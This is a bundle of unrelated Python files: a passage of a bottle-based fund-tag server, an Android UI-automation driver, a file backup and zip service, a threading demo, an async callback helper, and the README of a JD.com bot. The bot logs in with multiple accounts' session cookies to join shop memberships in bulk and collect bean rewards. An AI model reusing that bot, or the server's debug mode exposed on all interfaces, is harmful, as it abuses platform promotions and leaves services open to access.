    new_tags_str: str = bottle.request.query.new_tags
    base_info: list = dict_only_get(global_valid_funds_base_info_dict, fund_id)
    # Parameter validation.
    if base_info is None or new_tags_str is None:
        return f"edit_tags failed, {fund_id}, {new_tags_str}"
    old_tags_str: str = base_info[5]
    base_info[5] = new_tags_str
    gz_info: dict = dict_only_get(global_funds_gz_infos, fund_id)
    dict_set(gz_info, "tags", new_tags_str)
    print(f"{get_current_time()} edit_tags {fund_id} old_tags:{old_tags_str}, new_tags:{new_tags_str}")
    valid_funds_db_mgr.update_tags(fund_id, new_tags_str)
    return f"edit_tags ok, {fund_id} old_tags:{old_tags_str}, new_tags:{new_tags_str}"
@bottle.route('/static/<filename>')
def server_static(filename):
    """HTTP handler: serve files from the local ./static/ directory."""
    static_root = "./static/"
    return bottle.static_file(filename, root=static_root)
def start_server():
    """Run the bottle HTTP server on all interfaces; blocks forever."""
    # gevent backend pairs with the monkey-patching done at import time.
    server_options = dict(host='0.0.0.0', port=8080, debug=True, server='gevent')
    bottle.run(**server_options)
# Entry point: the refresh loop runs in a background thread while the HTTP
# server blocks the main thread.
if __name__ == "__main__":
    monitor_thread = threading.Thread(target=start_monitor)
    monitor_thread.start()
    start_server()
########################################################################################################################################################
########################################################################################################################################################
def read_fenzu_list(the_id: str):
    """Load the fund grouping with id *the_id* from ./json/fenzu.json.

    :param the_id: key of the group inside the JSON document.
    :return: the group's dict, or None when the id is unknown.
    """
    with open("./json/fenzu.json", "r", encoding="utf-8") as f:
        fenzu_data: dict = json.load(f)
    # Grouping is maintained in a backend JSON file for now; direct in-page
    # grouping is postponed.  Key quantitative indicators to add: position
    # between historical peak and valley (valley=0, peak=100), N-day high /
    # M-day low, X consecutive up/down days.
    # BUG fix: the original computed the group but never returned it.
    return fenzu_data.get(the_id)
|
uiautomation.py | # coding=utf-8
__author__ = 'lxn3032'
import os
import requests
import time
import warnings
import atexit
try:
new_airtest_api = True
import airtest.core.api as _____
except ImportError:
new_airtest_api = False
from airtest.core.android.utils.iputils import get_ip_address
from airtest.core.android.ime import YosemiteIme
from hrpc.client import RpcClient
from hrpc.transport.http import HttpTransport
from poco import Poco
from poco.agent import PocoAgent
from poco.sdk.Attributor import Attributor
from poco.utils.hrpc.hierarchy import RemotePocoHierarchy
from poco.drivers.android.utils.installation import install, uninstall
# Public API of this module.
__all__ = ['AndroidUiautomationPoco', 'AndroidUiautomationHelper']
# Directory containing this file; used to locate the bundled APKs in ./lib.
this_dir = os.path.dirname(os.path.realpath(__file__))
# Package names of the on-device poco service app and its instrumentation twin.
PocoServicePackage = 'com.netease.open.pocoservice'
PocoServicePackageTest = 'com.netease.open.pocoservice.test'
class AndroidRpcClient(RpcClient):
    """RpcClient speaking HTTP to the poco service running on the device."""

    def __init__(self, endpoint):
        # NOTE(review): endpoint must be assigned before super().__init__,
        # which presumably triggers initialize_transport() — confirm in
        # RpcClient before reordering.
        self.endpoint = endpoint
        super(AndroidRpcClient, self).__init__(HttpTransport)

    def initialize_transport(self):
        """Create the HTTP transport bound to this client's endpoint."""
        return HttpTransport(self.endpoint, self)
class AttributorWrapper(Attributor):
    """Attributor proxy that reroutes text input through the IME.

    Some devices still do not support Accessibility.ACTION_SET_TEXT, and the
    Yosemite IME remains the most compatible way to type text.  This class
    hooks attribute writes: setting 'text' goes through the IME, everything
    else is forwarded to the remote attributor unchanged.
    """

    def __init__(self, remote, ime):
        self.remote = remote
        self.ime = ime

    def getAttr(self, node, attrName):
        """Read an attribute straight from the remote attributor."""
        return self.remote.getAttr(node, attrName)

    def setAttr(self, node, attrName, attrVal):
        """Write an attribute; 'text' is typed via the IME for compatibility."""
        if attrName != 'text':
            self.remote.setAttr(node, attrName, attrVal)
            return
        self.ime.text(attrVal)
class AndroidPocoAgent(PocoAgent):
    """PocoAgent backed by the on-device uiautomation HRPC service."""

    def __init__(self, endpoint, ime):
        self.client = AndroidRpcClient(endpoint)
        framework = self.client.remote('poco-uiautomation-framework')
        # Wrap the remote attributor so that text input goes through the IME.
        wrapped_attributor = AttributorWrapper(framework.attributor, ime)
        hierarchy = RemotePocoHierarchy(framework.dumper, framework.selector, wrapped_attributor)
        super(AndroidPocoAgent, self).__init__(hierarchy, framework.inputer, framework.screen, None)
class AndroidUiautomationPoco(Poco):
    """
    Poco Android implementation for testing **Android native apps**.

    Args:
        device (:py:obj:`Device`): :py:obj:`airtest.core.device.Device` instance provided by ``airtest``. leave the
         parameter default and the default device will be chosen. more details refer to ``airtest doc``
        using_proxy (:py:obj:`bool`): whether use adb forward to connect the Android device or not
        force_restart (:py:obj:`bool`): whether always restart the poco-service-demo running on Android device or not
        options: see :py:class:`poco.pocofw.Poco`

    Examples:
        The simplest way to initialize AndroidUiautomationPoco instance and no matter your device network status::

            from poco.drivers.android.uiautomation import AndroidUiautomationPoco

            poco = AndroidUiautomationPoco()
            poco('android:id/title').click()
            ...
    """

    def __init__(self, device=None, using_proxy=True, force_restart=True, **options):
        # Resolve the target device, falling back to airtest's current one
        # (connecting a default device when none is attached yet).
        if not device:
            try:
                # new version
                from airtest.core.api import connect_device, device as current_device
                if not current_device():
                    connect_device("Android:///")
            except ImportError:
                # old version
                from airtest.cli.runner import device as current_device
                from airtest.core.main import set_serialno
                if not current_device():
                    set_serialno()
            self.device = current_device()
        else:
            self.device = device
        self.adb_client = self.device.adb
        # With adb forwarding the service is reached via the adb host;
        # otherwise connect to the device's own IP address.
        if using_proxy:
            self.device_ip = self.adb_client.host or "127.0.0.1"
        else:
            if new_airtest_api:
                self.device_ip = self.adb_client.get_ip_address()
            else:
                self.device_ip = get_ip_address(self.adb_client)
        # save current top activity (@nullable) so it can be restored after
        # the service installation churn.
        current_top_activity_package = self.device.get_top_activity_name()
        if current_top_activity_package is not None:
            current_top_activity_package = current_top_activity_package.split('/')[0]
        # install ime
        if new_airtest_api:
            self.ime = YosemiteIme(self.adb_client)
        else:
            self.ime = YosemiteIme(self.device)
        self.ime.start()
        # install the poco service APKs
        self._instrument_proc = None
        self._install_service()
        # forward the service's two TCP ports (or use them directly)
        if using_proxy:
            p0, _ = self.adb_client.setup_forward("tcp:10080")
            p1, _ = self.adb_client.setup_forward("tcp:10081")
        else:
            p0 = 10080
            p1 = 10081
        # start: the standalone uiautomator conflicts with this service.
        if self._is_running('com.github.uiautomator'):
            warnings.warn('{} should not run together with "uiautomator". "uiautomator" will be killed.'
                          .format(self.__class__.__name__))
            self.adb_client.shell(['am', 'force-stop', 'com.github.uiautomator'])
        ready = self._start_instrument(p0, force_restart=force_restart)
        if not ready:
            # If startup failed, uninstall and retry — an oddity of instrumentation.
            uninstall(self.adb_client, PocoServicePackage)
            self._install_service()
            ready = self._start_instrument(p0)
        # Bring back whatever app was in the foreground before installing.
        if current_top_activity_package is not None:
            current_top_activity2 = self.device.get_top_activity_name()
            if current_top_activity2 is None or current_top_activity_package not in current_top_activity2:
                self.device.start_app(current_top_activity_package, activity=True)
        if not ready:
            raise RuntimeError("unable to launch AndroidUiautomationPoco")
        endpoint = "http://{}:{}".format(self.device_ip, p1)
        agent = AndroidPocoAgent(endpoint, self.ime)
        super(AndroidUiautomationPoco, self).__init__(agent, **options)

    def _install_service(self):
        """Install (or update) the poco service APK and its test APK.

        :return: True when the main APK was (re)installed, per install().
        """
        updated = install(self.adb_client, os.path.join(this_dir, 'lib', 'pocoservice-debug.apk'))
        install(self.adb_client, os.path.join(this_dir, 'lib', 'pocoservice-debug-androidTest.apk'), updated)
        return updated

    def _is_running(self, package_name):
        """Return True when a process whose name ends with *package_name* shows up in `ps`."""
        processes = self.adb_client.shell(['ps']).splitlines()
        for ps in processes:
            ps = ps.strip()
            if ps.endswith(package_name):
                return True
        return False

    # def _keep_running_instrumentation(self):
    #     def loop():
    #         while True:
    #             proc = self.adb_client.shell([
    #                 'am', 'instrument', '-w', '-e', 'class',
    #                 '{}.InstrumentedTestAsLauncher#launch'.format(PocoServicePackage),
    #                 '{}.test/android.support.test.runner.AndroidJUnitRunner'.format(PocoServicePackage)],
    #                 not_wait=True)
    #             stdout, stderr = proc.communicate()
    #             print(stdout)
    #             print(stderr)
    #             time.sleep(1)
    #     t = threading.Thread(target=loop)
    #     t.daemon = True
    #     t.start()

    def _start_instrument(self, port_to_ping, force_restart=True):
        """Launch the poco service via `am instrument` and wait until it answers HTTP.

        :param port_to_ping: port reaching the service's HTTP endpoint.
        :param force_restart: when False, reuse an already-responding service.
        :return: True when the service responded, False otherwise.
        """
        if not force_restart:
            try:
                requests.get('http://{}:{}'.format(self.device_ip, port_to_ping), timeout=10)
            except:
                # Not answering yet — fall through and (re)start it.
                pass
            else:
                return True
        if self._instrument_proc is not None:
            self._instrument_proc.kill()
            self._instrument_proc = None
        ready = False
        self.adb_client.shell(['am', 'force-stop', PocoServicePackage])
        # Start the main activity before instrumenting, otherwise the
        # instrumentation may fail.
        self.adb_client.shell('am start -n {}/.TestActivity'.format(PocoServicePackage))
        instrumentation_cmd = [
            'am', 'instrument', '-w', '-e', 'debug', 'false', '-e', 'class',
            '{}.InstrumentedTestAsLauncher'.format(PocoServicePackage),
            '{}.test/android.support.test.runner.AndroidJUnitRunner'.format(PocoServicePackage)]
        if new_airtest_api:
            self._instrument_proc = self.adb_client.start_shell(instrumentation_cmd)
        else:
            self._instrument_proc = self.adb_client.shell(instrumentation_cmd, not_wait=True)
        # Make sure the instrumentation process dies with this interpreter.
        atexit.register(self._instrument_proc.kill)
        time.sleep(2)
        # Poll the HTTP endpoint up to 10 times; a hard timeout aborts early,
        # a connection refusal means "not up yet" and is retried.
        for i in range(10):
            try:
                requests.get('http://{}:{}'.format(self.device_ip, port_to_ping), timeout=10)
                ready = True
                break
            except requests.exceptions.Timeout:
                break
            except requests.exceptions.ConnectionError:
                time.sleep(1)
                print("still waiting for uiautomation ready.")
                continue
        return ready

    def on_pre_action(self, action, proxy, args):
        """Take a screenshot before every action, for the airtest log."""
        try:
            from airtest.core.api import snapshot
        except ImportError:
            # compatible with old airtest
            from airtest.core.main import snapshot
        # NOTE(review): `unicode` is Python 2 only — this line fails on
        # Python 3; confirm the intended interpreter.
        snapshot(msg=unicode(proxy))
class AndroidUiautomationHelper(object):
    # Cache of already-initialized poco instances, keyed by device object.
    _nuis = {}

    @classmethod
    def get_instance(cls, device):
        """
        This is only a slot to store and get already initialized poco instance rather than initializing again. You can
        simply pass the ``current device instance`` provided by ``airtest`` to get the AndroidUiautomationPoco instance.
        If no such AndroidUiautomationPoco instance, a new instance will be created and stored.

        Args:
            device (:py:obj:`airtest.core.device.Device`): more details refer to ``airtest doc``

        Returns:
            poco instance
        """
        instance = cls._nuis.get(device)
        if instance is None:
            instance = AndroidUiautomationPoco(device)
            cls._nuis[device] = instance
        return instance
|
scanbackup_20210224145802.py | """
1、文件到这里
一份给ES 一份给自己
新增ES旧索引入库
在继承原有功能的基础上
重构备份程序,按照数据内的
国家-当前时间(年-月-日)
如果按照数据内的时间的话也会面临和按国家端口备份的问题
不用再分端口了
create by judy 20201217
"""
from pathlib import Path
import threading
import json
from queue import Queue
import traceback
import datetime
import time
from shutil import copyfile
import zipfile
import shutil
class ScanBackUP(object):
    """Forward incoming scan files to the ES ingest folder while archiving a
    backup copy grouped by country and date; date folders from previous days
    are zipped by background worker threads."""

    def __init__(self) -> None:
        # super().__init__()
        # All incoming data lands here first.
        self._input = None
        # Every file gets a copy here for ES; this folder is not managed by this program.
        self._esinput = None
        # Files to back up are moved here; everything to process lives here.
        self._dbu_input = None
        self._databack = None
        self._zipdata: Path = None
        self._zip_size = None
        # Backup threads default to one; changeable via config plus a restart.
        self.backup_thread = 1
        self.zip_thread = 1
        # Switch controlling whether files are also copied to the ES input.
        self.copy_esinput_enable = True
        self._tmp = Path('./tmp')
        self._tmp.mkdir(exist_ok=True)
        # Whether a copy should also go to the old ES index.
        # NOTE(review): _old_esinput is never assigned after this — see the
        # suspicious duplicated block at the end of _init_cpinfo().
        self._old_esinput = None
        self.config_path = Path(r'./config_path.json')
        try:
            self._init_cpinfo()
        except:
            raise Exception(
                f"初始化配置参数失败,请检查配置文件\nerror:{traceback.format_exc()}")
        # Runtime state.
        # File lock: only one thread may manipulate files at a time.
        self.__file_locker = threading.Lock()
        self.__scan_file_locker = threading.Lock()
        self._zipfile_locker = threading.Lock()
        # Zipping can take a while, so track folders currently being zipped.
        self._zip_dealing = {}
        # Work queues keyed by file suffix; currently only iscan.
        self.iscan_task_queue = Queue()
        self._zip_queue = Queue()
        self.iscan_suffix = '.iscan_search'
        # try:
        #     self._restore_existdata()
        # except:
        #     raise Exception(
        #         "There's something wrong with restoring the environment")

    def _init_cpinfo(self):
        """
        Load the folder paths and tuning parameters from the JSON config file.
        :return:
        """
        conf_str = self.config_path.read_text(encoding='utf-8')
        conf_dict = json.loads(conf_str)
        _input = conf_dict.get('data_input')
        if not isinstance(_input, str):
            raise Exception("Unknown data_input path")
        self._input = Path(_input)
        self._input.mkdir(exist_ok=True)
        print(
            f"Start scan data file, input_file_path:{self._input.as_posix()}")
        _esinput = conf_dict.get('es_input')
        if not isinstance(_esinput, str):
            raise Exception("Unknown es_input path")
        self._esinput = Path(_esinput)
        self._esinput.mkdir(exist_ok=True)
        print(f"Save data to ES, es_path:{self._esinput.as_posix()}")
        _dbuinput = conf_dict.get('backup_input')
        if not isinstance(_dbuinput, str):
            raise Exception("Unkown backup_input path")
        self._dbu_input = Path(_dbuinput)
        self._dbu_input.mkdir(exist_ok=True)
        print(f"Data backup process path:{self._dbu_input.as_posix()}")
        _databack = conf_dict.get('databackup')
        if not isinstance(_databack, str):
            raise Exception("Unknown databackup path")
        self._databack = Path(_databack)
        self._databack.mkdir(exist_ok=True)
        print(f"Data save backup path:{self._databack.as_posix()}")
        _zipdata = conf_dict.get('zipdata')
        if not isinstance(_zipdata, str):
            raise Exception("Unkown zipdata path")
        self._zipdata = Path(_zipdata)
        self._zipdata.mkdir(exist_ok=True)
        print(f"Zipdata save path:{self._zipdata.as_posix()}")
        _zip_size = conf_dict.get('zip_size')
        if not isinstance(_zip_size, int):
            raise Exception("Unknown zip_size type")
        # Convert the configured size from MB to bytes.
        self._zip_size = _zip_size * 1024 * 1024
        print(f"Zip data size:{_zip_size}MB")
        backupthread = conf_dict.get('backup_thread')
        if not isinstance(backupthread, int):
            raise Exception("Unknown backupthread type")
        self.backup_thread = backupthread
        zipthread = conf_dict.get('zipdata_thread')
        if not isinstance(zipthread, int):
            raise Exception("Unknown zipthread type")
        self.zip_thread = zipthread
        time_limit = conf_dict.get('time_limit')
        if not isinstance(time_limit, int):
            raise Exception("Unknown time_limit type")
        self._backup_interval_time = time_limit * 24 * 60 * 60
        print(f"Zip data time expired after {time_limit} days")
        # Copying to the ES input folder is enabled by default.
        copy_esinput_enable = conf_dict.get('copy_to_esinput', True)
        self.copy_esinput_enable = copy_esinput_enable
        # Copy data for the old ES index.
        # NOTE(review): this re-reads 'es_input' and re-assigns self._esinput,
        # duplicating the block above — looks like a copy-paste slip; the
        # intent was presumably an 'old_es_input' key stored into
        # self._old_esinput (initialized in __init__ but never set). Confirm
        # against the config schema before changing.
        _old_esinput = conf_dict.get('es_input')
        if not isinstance(_esinput, str):
            raise Exception("Unknown es_input path")
        self._esinput = Path(_esinput)
        self._esinput.mkdir(exist_ok=True)
        print(f"Save data to ES, es_path:{self._esinput.as_posix()}")

    def scan_file(self):
        """
        Scan the input folder forever: move each file to ./tmp, copy
        '.iscan_search' files into the backup pipeline, and forward
        everything to the ES input folder.
        :return:
        """
        while True:
            try:
                for file in self._input.iterdir():
                    name = file.name
                    # Move everything into the tmp folder first.
                    tmpname = self._tmp / name
                    # file.replace(tmpname)
                    with self.__scan_file_locker:
                        # Move to tmp immediately, otherwise the next scan
                        # pass would pick up the same file again.
                        shutil.move(file.as_posix(), tmpname.as_posix())
                    try:
                        if tmpname.suffix == self.iscan_suffix:
                            # Copy only — the original still goes to ES below.
                            # source: Path = self._input / name
                            target: Path = self._dbu_input / name
                            copyfile(tmpname.as_posix(), target.as_posix())
                            self.iscan_task_queue.put(target)
                            print(
                                f"Backup iscan_search data, filename:{file.as_posix()}")
                    except:
                        print(
                            f'Scan list file error, err:{traceback.format_exc()}')
                    finally:
                        # No matter what happened, forward the file to the ES input.
                        if self.copy_esinput_enable:
                            outname = self._esinput / name
                            tmpname.replace(outname)
                        # Normally nothing is left behind, but accidents happen:
                        # delete anything still sitting in tmp.
                        if tmpname.exists():
                            tmpname.unlink()
            except:
                print(f'Scan task file error, err:{traceback.format_exc()}')
                continue
            finally:
                # NOTE(review): printed on every pass, even when files were handled.
                print("There is no scan data to back up")
                time.sleep(0.5)

    def _process_file(self, tmpfile: Path):
        """
        Briefly open the file and read the country code out of its JSON body.
        Returns 'UNKNOWN' when the geoinfo chain is missing.
        """
        with tmpfile.open('r', encoding='utf-8') as fp:
            j_text = fp.read()
        d_text = json.loads(j_text)
        # scan_time = d_text.get('time')
        # if scan_time is None:
        #     scan_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        try:
            country = d_text.get('geoinfo').get('country').get('code')
        except:
            country = 'UNKNOWN'
        return country

    def back_file(self):
        """
        Backup worker: take queued files, read their country, and move each
        into the per-country / per-day backup folder.
        :return:
        """
        got = False
        while True:
            got = False
            if self.iscan_task_queue.empty():
                time.sleep(0.5)
                continue
            try:
                bfile: Path = self.iscan_task_queue.get()
                got = True
                name = bfile.name
                # Read the country straight from the file body.
                country = self._process_file(bfile)
                # Destination folder is keyed by today's date.
                date_now_str = datetime.datetime.now().strftime("%Y-%m-%d")
                # Lock while creating folders; plain moves need no coordination.
                with self.__file_locker:
                    # Move the file over.
                    dirname: Path = self._databack / country / date_now_str
                    dirname.mkdir(exist_ok=True, parents=True)
                    # Name of the file after the move.
                    filename = dirname / name
                    # Move into the target folder.
                    bfile.replace(filename)
                    print(
                        f"Backup file, country:{country}, filename:{name}, date:{date_now_str}")
            except:
                print(f'Backup file error:\n{traceback.format_exc()}')
            finally:
                if got:
                    self.iscan_task_queue.task_done()

    def scan_zip_file(self):
        """
        Hourly scanner: queue every date folder older than today for
        compression, skipping folders already being zipped.
        """
        while True:
            try:
                date_now = datetime.datetime.now().date()
                for country in self._databack.iterdir():
                    if not country.exists():
                        continue
                    country_name = country.name
                    for d_file in country.iterdir():
                        if self._zip_dealing.__contains__(d_file):
                            continue
                        d_name = d_file.name
                        d_date = datetime.datetime.strptime(
                            d_name, "%Y-%m-%d").date()
                        # Compress anything dated before today.
                        if date_now > d_date:
                            self._zip_queue.put((d_file, country_name))
                            with self._zipfile_locker:
                                # Mark the folder as in-flight.
                                self._zip_dealing[d_file] = 1
                            print(
                                f"A file wait to zip, filename:{d_file.as_posix()}")
            except:
                print(f"Zip file error:\n{traceback.format_exc()}")
            finally:
                print("There is no scan data to zip")
                time.sleep(3600)

    def process_zip_file(self):
        """
        Zip worker: compress queued date folders into the archive folder,
        deleting each source file after it is written and removing the
        emptied folder at the end.
        """
        got = False
        zipfile_path = None
        while True:
            got = False
            if self._zip_queue.empty():
                time.sleep(1)
                continue
            try:
                zipfile_path, country = self._zip_queue.get()
                got = True
                zip_store_file = self._zipdata / country
                zip_store_file.mkdir(exist_ok=True)
                zipname = zip_store_file/f"{zipfile_path.name}.zip"
                print(
                    f"Start zipfile, filename:{zipname.as_posix()}")
                # Append mode so an interrupted run can resume into the same archive.
                with zipfile.ZipFile(zipname.as_posix(), 'a', zipfile.ZIP_DEFLATED) as write:
                    for file in zipfile_path.iterdir():
                        # NOTE(review): write() without arcname stores the
                        # file's full path inside the archive — confirm intended.
                        write.write(file.as_posix())
                        # Delete each source file once archived.
                        file.unlink()
                    # NOTE(review): redundant — the with-statement closes the archive.
                    write.close()
                # Finally remove the now-empty date folder.
                zipfile_path.rmdir()
                print(
                    f"Store zipfile success, filename:{zipname.as_posix()}")
            except:
                print(f"Zip file error:\n{traceback.format_exc()}")
            finally:
                if got:
                    self._zip_queue.task_done()
                    with self._zipfile_locker:
                        self._zip_dealing.pop(zipfile_path, None)

    def start(self):
        """
        Launch all workers: one input scanner, N backup workers, one zip
        scanner, and M zip workers (all daemon-less, run forever).
        :return:
        """
        thread1 = threading.Thread(target=self.scan_file, name="scanfile")
        thread1.start()
        for i in range(self.backup_thread):
            t = threading.Thread(target=self.back_file, name=f"backfile{i}")
            t.start()
        thread2 = threading.Thread(
            target=self.scan_zip_file, name=f"scan_zipfile")
        thread2.start()
        for j in range(self.zip_thread):
            tz = threading.Thread(
                target=self.process_zip_file, name=f"zipfile{j}")
            tz.start()
if __name__ == "__main__":
    # Entry point: build the backup service and spin up its worker threads.
    ScanBackUP().start()
|
# Minimal threading demo: the main thread ends while the worker still sleeps.
import threading, time
print('Start of program.')
def takeANap():
    """Sleep five seconds, then announce waking up."""
    time.sleep(5)
    print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of program.')  # printed before 'Wake up!' — the worker is still sleeping
|
async_.py | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import sys
import time
import threading
__all__ = [
'await_callback',
]
class ThreadExceptHookHandler(object):
    """Workaround to deal with a bug in the Python interpreter (!).

    Report: http://bugs.python.org/issue1230540
    Discussion: https://stackoverflow.com/a/31622038/269335
    PR (not yet merged): https://github.com/python/cpython/pull/8610
    Disclaimer (!): https://news.ycombinator.com/item?id=11090814

    While this context manager is active, every newly created
    ``threading.Thread`` has its ``run`` method wrapped so that uncaught
    exceptions are forwarded to ``sys.excepthook`` instead of being handled
    by the thread machinery's default (which bypasses the hook).
    """

    def __enter__(self):
        original_init = threading.Thread.__init__

        def init(self, *args, **kwargs):
            original_init(self, *args, **kwargs)
            original_run = self.run

            def run_with_except_hook(*args2, **kwargs2):
                try:
                    original_run(*args2, **kwargs2)
                except Exception:
                    sys.excepthook(*sys.exc_info())

            self.run = run_with_except_hook

        self._original_init = original_init
        threading.Thread.__init__ = init
        return self

    def __exit__(self, *args):
        # Restore the unpatched constructor even if the body raised.
        threading.Thread.__init__ = self._original_init


def await_callback(async_func, callback_name='callback', errback_name=None, *args, **kwargs):
    """Wait for the completion of an asynchronous code that uses callbacks to signal completion.

    This helper function turns an async function into a synchronous one,
    waiting for its completion before moving forward (without doing a busy wait).
    It is useful to minimize "callback hell" when more advanced options
    like ``asyncio`` are not available.

    Parameters
    ----------
    async_func : callable
        An asynchronous function that receives at least one callback parameter
        to signal completion.
    callback_name : string, optional
        Name of the callback parameter of ``async_func``.
        Default is `callback`.
    errback_name : string, optional
        Name of the error handling callback parameter of ``async_func``.
        Default is None.

    Notes
    -----
    Exceptions thrown during the async execution are handled and re-thrown as normal
    exceptions, even if they were raised on a different thread.

    Examples
    --------
    .. code-block:: python

        def do_async_stuff(callback):
            from threading import Thread

            def runner(cb):
                print('doing async stuff')
                cb('done')

            Thread(target=runner, args=(callback, )).start()

        result = await_callback(do_async_stuff)
    """
    wait_event = threading.Event()
    call_results = {}

    def inner_callback(*cb_args, **cb_kwargs):
        # Record whatever the async code reported and release the waiter.
        try:
            call_results['args'] = cb_args
            call_results['kwargs'] = cb_kwargs
            wait_event.set()
        except Exception as e:
            call_results['exception'] = e
            wait_event.set()

    # BUG FIX: honor the ``callback_name`` parameter — previously the key was
    # hard-coded to 'callback', so custom callback names were silently ignored.
    kwargs[callback_name] = inner_callback

    if errback_name:
        def inner_errback(error):
            # Normalize non-exception error values into an Exception.
            if isinstance(error, Exception):
                call_results['exception'] = error
            else:
                call_results['exception'] = Exception(str(error))
            wait_event.set()
        kwargs[errback_name] = inner_errback

    def unhandled_exception_handler(type, value, traceback):
        # Exceptions raised on worker threads land here via the patched hook.
        call_results['exception'] = value
        wait_event.set()

    try:
        # Install the unhandled exception handler.
        sys.excepthook = unhandled_exception_handler

        # Invoke the async method and wait for a callback/errback/exception.
        with ThreadExceptHookHandler():
            async_func(*args, **kwargs)
            wait_event.wait()
    finally:
        # Restore the built-in unhandled exception handler.
        sys.excepthook = sys.__excepthook__

    if 'exception' in call_results:
        raise call_results['exception']

    return_value = call_results['args']
    dict_values = call_results['kwargs']

    if not dict_values:
        # If nothing, then None
        if len(return_value) == 0:
            return None
        # If it's a one-item tuple,
        # un-wrap from it and return that element
        elif len(return_value) == 1:
            return return_value[0]
        else:
            return return_value

    if not return_value:
        return dict_values

    return return_value + (dict_values,)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
    def do_async_stuff(callback):
        """Spawn a worker thread that immediately completes via *callback*."""
        from threading import Thread
        def runner(cb):
            print('doing async stuff')
            # ..
            cb('done')
        Thread(target=runner, args=(callback, )).start()
    # Blocks until the callback fires, then prints 'done'.
    result = await_callback(do_async_stuff)
    print(result)
|
jd_OpenCard.py | #!/bin/env python3
# -*- coding: utf-8 -*
'''
项目名称: JD_OpenCard
Author: Curtin
功能:JD入会开卡领取京豆
CreateDate: 2021/5/4 下午1:47
UpdateTime: 2021/6/19
'''
version = 'v1.2.2'
readmes = """
# JD入会领豆小程序

## 使用方法
#### [手机用户(参考) https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw](https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw)
#### [PC用户 (参考) https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A](https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A)
#### [v4-bot用户 (参考) https://github.com/curtinlv/JD-Script/pull/12#issue-652134788](https://github.com/curtinlv/JD-Script/pull/12#issue-652134788)
## 目录结构
JD-Script/ #仓库
|-- LICENSE
|-- OpenCard # 主目录
| |-- jd_OpenCard.py # 主代码 (必要)
| |-- log # 临时目录(可删除)
| |-- OpenCardConfig.ini # 只配置文件(必要)
| |-- Readme.md # 说明书
| `-- start.sh # shell脚本(非必要)
`-- README.md
log目录结构、临时目录(可删除):
log
├── memory.json # 记忆、统计功能临时存放参数
├── shopid-2021-05-23.txt # 记录所有送豆的shopid
├── 入会N豆以上的shopid-2021-05-23.txt # 记录满足入会条件的shopid
├── 入会汇总.txt # 记录所有入会店铺送豆的加入、注销链接
├── 可退会账号【账号id】.txt # 记录跑脚本之前已经过入会且目前送豆的注销链接(可优先退会)
### `【兼容环境】`
1.Python3.3+ 环境
2.兼容ios设备软件:Pythonista 3、Pyto(已测试正常跑,其他软件自行测试)
3.Windows exe
安装依赖模块 :
pip3 install requests
执行:
python3 jd_OpenCard.py
start.sh 脚本运行方法:
1.适合定时任务或不想依赖ini配置文件。
2.支持单号跑多开,如
cp start.sh start_2.sh
sh start_2.sh #只跑里面配置的参数,如cookie
3.定时任务(参考):
0 8 * * * sh /home/curtin/JD-Script/OpenCard/start.sh
2 8 * * * sh /home/curtin/JD-Script/OpenCard/start_2.sh
## `【更新记录】`
2021.6.19: (v1.2.2)
* 修复多线程报错
2021.6.14: (v1.2.1)
* 新增单双线程控制
* 修复一些问题,如腾讯云跑异常报错。
2021.5.28:(v1.2.0)
* 新增单或多账号并发
- Concurrent=yes #开启
* 新增企业微信、Bark推送
* 优化一些逻辑
- 如随机账号查询礼包,仅开启单账号时候
- 京豆统计
2021.5.23:(v1.1.1)
* 修复一些问题及优化一些代码
* 修复Env环境读取变量问题
* 新增 start.sh 运行脚本(可Env环境使用)
- 运行方式 sh start.sh
2021.5.21:(v1.1.0)
* 修复一些问题及优化一些代码:
- 修复最后统计显示为0,新增开卡个数统计
- 修复记忆功能一些bug
- 等等一些小问题
* 新增机器人通知
- 开启远程shopid、配合crontab 坐等收豆
2021.5.15:(v1.0.5)
* 新增远程获取shopid功能
- isRemoteSid=yes #开启
* 修改已知Bug
2021.5.9:(v1.0.4 Beta)
* 优化代码逻辑
* 打包exe版本测试
2021.5.8:(v1.0.3)
* 优化记忆功能逻辑:
- cookiek个数检测
- shopid个数检测
- 上一次中断最后记录的账号id检测不存在本次ck里面
- 临时文件log/memory.json是否存在
- 以上任意一条命中则记忆接力功能不生效。
2021.5.7:(v1.0.2)
* 优化代码逻辑
* 修复已知Bug
2021.5.5:(v1.0.1)
* 新增记忆功能,如中断后下次跑会接着力跑(默认开启)
- memory= True
* 新增仅记录shopid,不入会功能(默认关闭)
- onlyRecord = no
* 修复已知Bug
2021.5.4:(v1.0.0)
* 支持多账号
- JD_COOKIE=pt_key=xxx;pt_pin=xxx;&pt_key=xxx;pt_pin=xxx; #多账号&分隔
* 限制京豆数量入会,例如只入50豆以上
- openCardBean = 50
* 双线程运行
- 默认开启,且您没得选择。
* 记录满足条件的shopid 【record= True】默认开启 (./log 目录可删除)
- log/可销卡汇总.txt #记录开卡送豆的店铺销卡链接
- log/shopid-yyyy-mm-dd.txt #记录当天所有入会送豆的shopid
- log/可销卡账号xxx.txt #记录账号可销卡的店铺
### `【账号参数配置说明】`
### 主配置文件[ OpenCardConfig.ini ] 请保持utf-8默认格式
变量 | 值 | 说明
---- | ----- | ------
JD_COOKIE | pt_key=xxx;pt_pin=xxx; | 必要(多账号&分隔)
openCardBean | 30 | int,入会送豆满足此值,否则不入会
record | False或True | 布尔值,是否记录符合条件的shopid(默认True)
onlyRecord | False或True |布尔值, True:仅记录,不入会(默认False)
memory | False或True | 布尔值,开启记忆功能,接力上一次异常中断位置继续。(默认yes)
printlog | False或True | 布尔值,True:只打印部分日志 False:打印所有日志
sleepNum | False或True | Float,限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
isRemoteSid | False或True | 布尔值,True:使用作者远程仓库更新的id,False:使用本地shopid.txt的id
#### 兼容Env环境(如有配置则优先使用,适合AC、云服务环境等)
export JD_COOKIE='pt_key=xxx;pt_pin=xxx;' (多账号&分隔)
export openCardBean=30
export xxx=xxx
#### Ps:您可以到以下途径获取最新的shopid.txt,定期更新:
